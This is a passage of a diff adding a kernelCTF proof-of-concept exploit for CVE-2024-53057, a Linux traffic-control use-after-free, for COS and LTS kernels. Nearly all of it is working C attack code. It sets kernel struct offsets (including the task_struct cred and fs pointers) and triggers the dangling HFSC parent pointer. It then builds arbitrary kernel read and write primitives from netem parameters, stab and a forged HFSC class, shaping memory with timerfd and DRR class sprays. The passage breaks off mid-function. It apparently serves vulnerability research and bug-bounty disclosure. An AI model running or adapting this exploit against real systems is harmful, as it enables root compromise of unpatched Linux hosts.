b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit.c b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit.c new file mode 100644 index 000000000..e3e8e4820 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit.c @@ -0,0 +1,1465 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include 
+#include +#include +#include +#include + +#if defined(MITIGATION) || defined(COS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 280 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 336 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 100 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 968 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 216 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 112 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1632 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1536 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 2008 // offsetof(struct task_struct, cred) +#define FS_OFF 2088 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define 
STAB_OFF 40 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 1000 + +#elif defined(LTS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 296 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 352 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 96 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 1032 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 224 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 80 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1608 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1512 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 1984 // offsetof(struct task_struct, cred) +#define FS_OFF 2064 // 
offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 48 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 0 + +#endif + +/* Traffic control handles */ +#define VULN_NETEM_HANDLE 0xdead0000 + +/* Size of disttable */ +#define DIST_SIZE 1020 + +#define TIMER_BASE 50000 +#define TIMER_INC 100 +#define LABEL_TO_VALUE(x) (TIMER_BASE + TIMER_INC*x) + +#define DRR_SPRAY 36 +#define NETEM_SPRAY 20 + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +int clog_len; +int curr_ns; +unsigned char msgbuf[65536]; + +/* Netlink Messages */ + +/* Traffic control message header */ +struct __attribute__((packed)) tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +}; + +/* Network interface message header */ +struct __attribute__((packed)) if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Set network interface up */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + +/* Add/modify an HFSC qdisc */ +struct __attribute__((packed)) hfsc_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + int def; +}; + +struct hfsc_qdisc_msg hfsc_qdisc_msg = { + { + .nlmsg_len = sizeof(struct hfsc_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 8, + .rta_type = TCA_OPTIONS, + }, +}; + +/* Add/modify an RSC HFSC class */ +struct __attribute__((packed)) rsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + 
struct rtattr options_hdr; + struct rtattr rsc_hdr; + struct tc_service_curve rsc; +}; + +struct rsc_class_msg rsc_class_msg = { + { + .nlmsg_len = sizeof(struct rsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .rsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_RSC, + }, + .rsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an FSC HFSC class */ +struct __attribute__((packed)) fsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; +}; + +struct fsc_class_msg fsc_class_msg = { + { + .nlmsg_len = sizeof(struct fsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an USC HFSC class */ +struct __attribute__((packed)) usc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; + struct rtattr usc_hdr; + struct tc_service_curve usc; +}; + +struct usc_class_msg usc_class_msg = { + { + .nlmsg_len = sizeof(struct usc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = 
TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 36, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m2 = 1, + }, + .usc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_USC, + }, + .usc = { + .m2 = 1, + }, +}; + +/* Add/modify a DRR qdisc */ +struct __attribute__((packed)) drr_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; +}; + +struct drr_qdisc_msg drr_qdisc_msg = { + { + .nlmsg_len = sizeof(struct drr_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", +}; + +struct __attribute__((packed)) drr_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr quantum_hdr; + int quantum; +}; + +/* Add/modify a DRR class */ +struct drr_class_msg drr_class_msg = { + { + .nlmsg_len = sizeof(struct drr_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", + .options_hdr = { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .quantum_hdr = { + .rta_len = 8, + .rta_type = TCA_DRR_QUANTUM, + }, + .quantum = 65536, +}; + +/* Add/modify a TBF qdisc to let packets through */ +struct __attribute__((packed)) tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; +}; + +struct tbf_qdisc_msg tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | 
NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 44, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .buffer = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1000000000, + }, + }, +}; + +/* Add/modify a TBF qdisc to wait for pkt_len-1 secs */ +struct __attribute__((packed)) stall_tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; + struct rtattr burst_hdr; + int burst; +}; + +struct stall_tbf_qdisc_msg stall_tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct stall_tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 52, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1, + }, + }, + .burst_hdr = { + .rta_len = 8, + .rta_type = TCA_TBF_BURST, + }, + .burst = 1, +}; + + +/* Add/modify a netem qdisc to delay the packet */ +struct __attribute__((packed)) delay_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; +}; + +struct delay_netem_qdisc_msg delay_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct delay_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, 
+ .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 28, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + .latency = -1, + } +}; + +/* Add/modify a netem qdisc with many parameters. Used for type confusion */ +struct __attribute__((packed)) parms_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr ecn_hdr; + int ecn; + struct rtattr latency_hdr; + long latency; + struct rtattr jitter_hdr; + long jitter; + struct rtattr reorder_hdr; + struct tc_netem_reorder reorder; + struct rtattr corrupt_hdr; + struct tc_netem_corrupt corrupt; + struct rtattr rate_hdr; + struct tc_netem_rate rate; + struct rtattr rate64_hdr; + long rate64; + struct rtattr slot_hdr; + struct tc_netem_slot slot; +}; + +struct parms_netem_qdisc_msg parms_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct parms_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = { + .rta_len = 160, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + }, + .ecn_hdr = { + .rta_len = 8, + .rta_type = TCA_NETEM_ECN, + }, + .latency_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_LATENCY64, + }, + .jitter_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_JITTER64, + }, + .reorder_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_REORDER, + }, + .corrupt_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_CORRUPT, + }, + .rate64_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_RATE64, + }, + .rate_hdr = { + .rta_len = 20, + .rta_type = TCA_NETEM_RATE, + }, + .slot_hdr = { + .rta_len = 44, + .rta_type = TCA_NETEM_SLOT, + }, +}; + +/* Add/modify a netem qdisc with a slot_dist buffer */ +struct __attribute__((packed)) 
dist_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr dist_hdr; + char dist[DIST_SIZE]; +}; + +struct dist_netem_qdisc_msg dist_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct dist_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 32 + DIST_SIZE, + .rta_type = TCA_OPTIONS, + }, + .dist_hdr = { + .rta_len = 4 + DIST_SIZE, + .rta_type = TCA_NETEM_SLOT_DIST, + }, +}; + + +/* Add a basic filter */ +struct __attribute__((packed)) basic_filter_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr classid_hdr; + int classid; +}; + +struct basic_filter_msg basic_filter_msg = { + { + .nlmsg_len = sizeof(struct basic_filter_msg), + .nlmsg_type = RTM_NEWTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + .tcm_handle = 1, + .tcm_info = TC_H_MAKE(1 << 16, 3 << 8), + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "basic", + .options_hdr = + { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .classid_hdr = { + .rta_len = 8, + .rta_type = TCA_BASIC_CLASSID, + }, +}; + + +/* Delete all of a qdisc's filters */ +struct tf_msg del_filter_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a qdisc */ +struct tf_msg del_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + 
.tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a class */ +struct tf_msg del_class_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Dump info for all qdiscs */ +struct tf_msg get_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_GETQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_DUMP, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + + +/* Syscall used to wait for RCU grace period */ +int membarrier(unsigned int flags, int cpu_id) { + return syscall(SYS_membarrier, flags, cpu_id); +} + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +struct sockaddr_in iaddr; +int nl_sock_fd, inet_sock_fd; +int nl_socks[4], inet_socks[4]; +void loopback_send (void) { + if (sendto(inet_sock_fd, "", 1, 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); +} + +/* Helper functions for sending netlink messages */ + +void netlink_write (int sock, struct nlmsghdr *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack = {}; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.nh.nlmsg_type == NLMSG_ERROR && ack.ne.error) { + errno = -ack.ne.error; + err_exit("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct nlmsghdr *m) { + m->nlmsg_flags &= ~NLM_F_ACK; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + m->nlmsg_flags |= NLM_F_ACK; +} + +int tc_add_qd (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); + return 
m->tm.tcm_handle; +} + +void tc_del_qd (int parent) { + struct tf_msg *m = &del_qdisc_msg; + m->tm.tcm_parent = parent; + netlink_write(nl_sock_fd, m); +} + +int tc_add_cl (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = parent | handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_cl (int handle) { + struct tf_msg *m = &del_class_msg; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); +} + +void tc_add_fl (struct basic_filter_msg *m, int clid) { + m->tm.tcm_parent = clid & 0xffff0000; + m->classid = clid; + netlink_write(nl_sock_fd, m); +} + +void tc_del_fl (int clid) { + struct tf_msg *m = &del_filter_msg; + m->tm.tcm_parent = clid & 0xffff0000; + netlink_write(nl_sock_fd, m); + +} + +void switch_ns (int ns) { + nl_sock_fd = nl_socks[ns - 1]; + inet_sock_fd = inet_socks[ns - 1]; + curr_ns = ns; +} + +/* Trigger the bug, creating a dangling pointer to parent class. + * Qdiscs must be configured so packet is enqueued at target class. 
*/ +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} + +/* Functions for reading and writing kernel memory */ + +void write_netem_parms(int handle, int *parms, struct tc_netem_slot *slot) { + struct parms_netem_qdisc_msg *m = &parms_netem_qdisc_msg; + if (parms) { + m->latency = *(long *)&parms[0]; + m->jitter = parms[2]; + // parms[3] corresponds to unwritable memory + m->qopt.loss = parms[4]; + m->ecn = parms[5]; + m->qopt.limit = parms[6]; + // parms[7] corresponds to unwritable memory + m->qopt.gap = parms[8]; + m->qopt.duplicate = parms[9]; + m->reorder.probability = parms[10]; + m->corrupt.probability = parms[11]; + m->rate64 = *(long *)&parms[12]; + } + if (slot) + m->slot = *slot; + tc_add_qd(m, 0, handle); +} + +void read_netem_parms (int handle, char *buf) { + int nread, tread = 0; + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(int *)&msgbuf[i] == handle /* "netem" */ + && *(long *)&msgbuf[i + 16] == 0x6d6574656e) { + off = i; + break; + } + } + + if (off != -1) { + memcpy(buf, msgbuf + off + 56, 8); // latency + memcpy(buf + 8, msgbuf + off + 68, 8); // jitter + memcpy(buf + 16, msgbuf + off + 36, 4); // loss + memcpy(buf + 20, msgbuf + off + 140, 4); // ecn + memcpy(buf + 24, msgbuf + off + 32, 4); // limit + memset(buf + 28, 0, 4); // counter (always zero) + memcpy(buf + 32, msgbuf + off + 40, 4); // gap + memcpy(buf + 36, msgbuf + off + 44, 4); // duplicate + memcpy(buf + 40, msgbuf + off + 96, 4); // reorder + memcpy(buf + 44, msgbuf + off + 108, 4); // corrupt + memcpy(buf + 48, msgbuf + off + 120, 8); // rate + } + memset(msgbuf, 0, sizeof(msgbuf)); +} + +long *stab_addr; +int stab_handle; +int stab_ns; +long stab_needle; +long 
stab_parms_buf[7], stab_slot_buf[5]; + +void setup_stab_read (int handle, long parms_kaddr, long slot_kaddr, int ns) { + int flags = 0x80; + memcpy((char *)stab_parms_buf + 9, &flags, 4); + slot_kaddr += 32; + memcpy((char *)stab_parms_buf + 33, &slot_kaddr, 8); + slot_kaddr -= 32; + + parms_kaddr += 48 - IFINDEX_OFF; + memcpy((char *)stab_parms_buf + 1, &parms_kaddr, 8); + parms_kaddr -= 48 - IFINDEX_OFF; + + stab_parms_buf[6] = 0xdeadbeef; // lower bytes of needle + + stab_slot_buf[1] = 0; // flags ; limit + stab_slot_buf[2] = parms_kaddr + 232; // ops + stab_slot_buf[3] = 0xbad57ab; // stab + stab_slot_buf[4] = 0; // hash + + stab_addr = &stab_slot_buf[3]; + stab_needle = stab_slot_buf[2] << 32 | stab_parms_buf[6]; + stab_handle = handle; + stab_ns = ns; +} + +void read_netem_stab (long needle, char *buf, int n) { + int nread, tread = 0; + + int old_ns = curr_ns; + switch_ns(stab_ns); + + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(long *)&msgbuf[i] == needle) { + off = i; + break; + } + } + + n = n > 24 ? 
24 : n; + if (off != -1) + memcpy(buf, msgbuf + off + STAB_OFF, n); + else + printf("[-] Failed to find stab\n"); + + memset(msgbuf, 0, sizeof(msgbuf)); + switch_ns(old_ns); +} + +long stab_read_8 (long addr) { + long val; + int old_ns = curr_ns; + switch_ns(stab_ns); + *stab_addr = addr - 32; + write_netem_parms(stab_handle, stab_parms_buf, stab_slot_buf); + tc_add_qd(&parms_netem_qdisc_msg, 0, stab_handle); + read_netem_stab(stab_needle, &val, 8); + switch_ns(old_ns); + return val; +} + +int vt_handle; +int vt_ns; +long vt_dist_p_kaddr; +void setup_vt_write (int handle, long addr, int ns) { + int old_ns = curr_ns; + vt_ns = ns; + switch_ns(vt_ns); + vt_handle = handle; + vt_dist_p_kaddr = addr + PRIVDATA_OFF + SLOT_DIST_OFF; + hfsc_qdisc_msg.def = 0; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x150000); + switch_ns(old_ns); +} + +long root_addr; +void vt_write_8 (long addr, long val) { + long parms[7] = {}, *hfsc_class, dist_kaddr; + + int old_ns = curr_ns; + switch_ns(vt_ns); + + hfsc_class = &dist_netem_qdisc_msg.dist[HFSC_CLASS_START]; + ((int *)hfsc_class)[LEVEL_OFF/4] = 1; + hfsc_class[PARENT_OFF/8] = addr - CL_CVTMIN_OFF; + hfsc_class[CL_VT_OFF/8] = val; + + tc_add_qd(&dist_netem_qdisc_msg, 0, vt_handle); + + dist_kaddr = stab_read_8(vt_dist_p_kaddr); + dist_kaddr += TABLE_OFF + HFSC_CLASS_START + VT_NODE_OFF; + memcpy((char *)parms + 1, &dist_kaddr, 8); + + write_netem_parms(vt_handle, parms, NULL); + loopback_send(); + + switch_ns(old_ns); +} + +/* Functions for setting timers */ + +int add_order[] = { 0, 1, 2, 4, 9, 3, 5, 11, 10, 13, 12, 15, 6, 7, 8, 14, 16, }; +#define NUM_NODES (sizeof(add_order)/sizeof(*add_order)) +#define NUM_NEG_NODES 20 +int timer_fds[NUM_NODES]; +int neg_timerfds[NUM_NEG_NODES]; +void init_timers () { + for (int i = 0; i < NUM_NODES - 2; i++) { + timer_fds[add_order[i]] = timerfd_create(CLOCK_MONOTONIC, 0); + if (timer_fds[add_order[i]] == -1) + err_exit("[-] timerfd_create"); + } + for (int i = 0; i < NUM_NEG_NODES; i++) { + neg_timerfds[i] = 
timerfd_create(CLOCK_MONOTONIC, 0); + if (neg_timerfds[i] == -1) + err_exit("[-] timerfd_create"); + } +} + +void add_neg_nodes (void) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(-1); + for (int i = 0; i < NUM_NEG_NODES; i++) { + if (timerfd_settime(neg_timerfds[i], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); + } +} + +void add_timer_node (long label) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(label); + if (timerfd_settime(timer_fds[label], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +void rm_timer_node (long val) { + struct itimerspec t = {}; + if (timerfd_settime(timer_fds[val], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +#define GR 0x61c88647u +#define QDISC_HASH(x) ((x)*GR >> 28) +long handle_to_kaddr (int handle, long netdevq_kaddr) { + long next_addr; + next_addr = stab_read_8(netdevq_kaddr + NET_DEVICE_OFF) + QDISC_HASH_TABLE_OFF; + next_addr = stab_read_8(next_addr + 8*QDISC_HASH(handle)); + while (next_addr) { + if ((int)stab_read_8(next_addr + HANDLE_OFF - QDISC_HLIST_OFF) == handle) + return next_addr - QDISC_HLIST_OFF; + next_addr = stab_read_8(next_addr); + } + return 0; +} + +int drr_spray_and_find (int parent) { + int drr_spray[DRR_SPRAY]; + + for (int i = 0; i < DRR_SPRAY; i++) + drr_spray[i] = tc_add_cl(&drr_class_msg, parent, i + 1); + + int target = 0; + for (int i = 0; i < DRR_SPRAY; i++) { + if (!target) { + tc_add_fl(&basic_filter_msg, drr_spray[i]); + loopback_send(); + 